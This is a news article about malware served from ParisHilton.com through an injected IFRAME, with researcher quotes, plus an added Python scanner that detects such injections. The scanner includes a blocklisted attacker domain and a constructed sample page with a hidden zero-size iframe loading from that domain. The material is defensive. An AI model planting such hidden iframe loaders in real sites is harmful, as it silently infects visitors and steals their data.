Paris Hilton's website infects users with data-stealing trojan

The official website for Paris Hilton has been targeted by cybercriminals to distribute malware, and most anti-virus scanners are not detecting the threat.

Months after the celebrity and hotel heiress' Sidekick phone and Facebook profile were hacked, attackers now have turned to her official website to spread malware and steal data.

Users who visited ParisHilton.com during the weekend and on Monday were met with a pop-up box that informed them they needed to "update" their systems, according to web security firm ScanSafe, which first reported the infection on Monday. The dialogue box gave users the option to choose “cancel” or “OK," but any click downloaded the malware.

“Regardless of what you click, the execution will occur -- the download has already happened,” Mary Landesman, senior security researcher at ScanSafe, told SCMagazineUS.com. “The user is trapped. The user is a complete victim. All they did is visit a website.”

The infection, which ScanSafe first detected on Friday, was cleared late Monday night, the company said.

If infected, end-users risk having their banking credentials exposed, Landesman said. For enterprises, the malware can redirect and intercept all their HTTP and internal network traffic.

“Anything that can intercept web traffic is a pretty big cause for concern -- combined with the standard keylogging and data theft capabilities,” Landesman said. "On a scale of one to 10 for the malware you most don't want on your system, this would definitely be a 10."

Just seven out of 38 anti-virus scanners initially detected the exploit, she said. None of the mainstream anti-virus scanners picked it up, and the “vast majority” of people would not have gotten an alert from their AV software.

Landesman said she is unsure how the attackers were able to compromise the site, but a method such as SQL injection could be to blame.

What is standard about this compromise and others of its type is that an IFRAME or similar HTML element is embedded somewhere in the site to load malicious content from an attacker-owned site, Landesman said.

Cybercriminals use the trusted site, in this case ParisHilton.com, as a “net” to capture victims, she said.

The same malware also was detected on the website sexy-celeb-photos[dot]com and other trusted sites, but the malicious code appears to have been loaded from you69tube[dot]com, Landesman said. Businesses should block that site, she said.
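The injected-IFRAME pattern described above, together with the advice to block the domain the content was loaded from, is the kind of thing a site operator or web proxy team wants to check for mechanically. The scanner below is an added example written for this page; it is not ScanSafe's tooling and not code from ParisHilton.com. It parses a page, lists every element that pulls a remote resource (iframe, script, embed, object), and flags third-party iframes, hidden loaders (zero-size or display:none), and loads from a blocklisted host. The only domain taken from the article is you69tube[dot]com; the sample pages and the host name parishilton.com used as the "own" origin are constructed for the demonstration.

```python
"""Scan HTML for injected IFRAMEs/scripts loading from attacker-controlled hosts.

Added example for this article, not ScanSafe's or the site operator's code.
The two sample pages below are constructed; only you69tube[dot]com is taken
from the article. The [dot] defanging is preserved in the blocklist and
undone only at comparison time.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Host the article reports as the source of the malicious content (defanged).
BLOCKLIST = {"you69tube[dot]com"}


def refang(domain):
    """Turn a defanged indicator such as 'evil[dot]com' back into a host name."""
    return domain.replace("[dot]", ".").lower()


def is_hidden(attrs):
    """Heuristic: zero/one-pixel or display:none loaders are a classic tell."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    width = (attrs.get("width") or "").strip()
    height = (attrs.get("height") or "").strip()
    return width in {"0", "1"} or height in {"0", "1"}


class ExternalLoadFinder(HTMLParser):
    """Collects every element that makes the browser fetch a remote resource."""

    # Tag -> attribute that names the remote resource.
    LOADERS = {"iframe": "src", "script": "src", "embed": "src", "object": "data"}

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        src_attr = self.LOADERS.get(tag)
        if src_attr is None:
            return
        attrs = dict(attrs)
        src = attrs.get(src_attr)
        if not src:
            return
        host = urlparse(src).hostname
        if host is None or host.lower() == self.page_host:
            return  # relative or same-origin load; not the pattern we hunt
        self.findings.append({
            "tag": tag,
            "host": host.lower(),
            "hidden": is_hidden(attrs),
            "line": self.getpos()[0],  # line in the HTML, for the cleanup
        })


def scan_page(html, page_host, blocklist=BLOCKLIST):
    """Return suspicious remote loads, each with the reasons it was flagged."""
    bad_hosts = {refang(d) for d in blocklist}
    finder = ExternalLoadFinder(page_host)
    finder.feed(html)
    results = []
    for f in finder.findings:
        reasons = []
        if f["host"] in bad_hosts:
            reasons.append("blocklisted host")
        if f["hidden"]:
            reasons.append("hidden loader")
        if f["tag"] == "iframe":
            reasons.append("third-party iframe")
        if reasons:
            results.append({**f, "reasons": reasons})
    return results


# Constructed samples: a benign page and one carrying an injected IFRAME.
CLEAN_PAGE = """<html><body>
<script src="/js/site.js"></script>
<img src="https://cdn.example.com/photo.jpg">
</body></html>"""

INJECTED_PAGE = """<html><body>
<script src="/js/site.js"></script>
<iframe src="http://you69tube.com/in.php" width=0 height=0 style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        hits = scan_page(page, "parishilton.com")
        print(name, "->", hits or "no suspicious remote loads")
```

Running it against a crawl of the site's own pages (and, for the "determine where the compromise occurred" step, against the files on disk and the content stored in the database, since an injected tag may live in a template, a post body or a footer include) gives the line numbers to clean up. A third-party iframe that is not hidden and not blocklisted is still reported, because legitimate embeds are worth a human look when a site is known to be compromised.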

To clear this up on the website's end, operators must remove the malicious code, determine how and where the compromise occurred, and secure the vulnerabilities that led to the compromise, Landesman said.

A representative from ParisHilton.com could not be reached for comment.

See original article on scmagazineus.com
Copyright © SC Magazine, US edition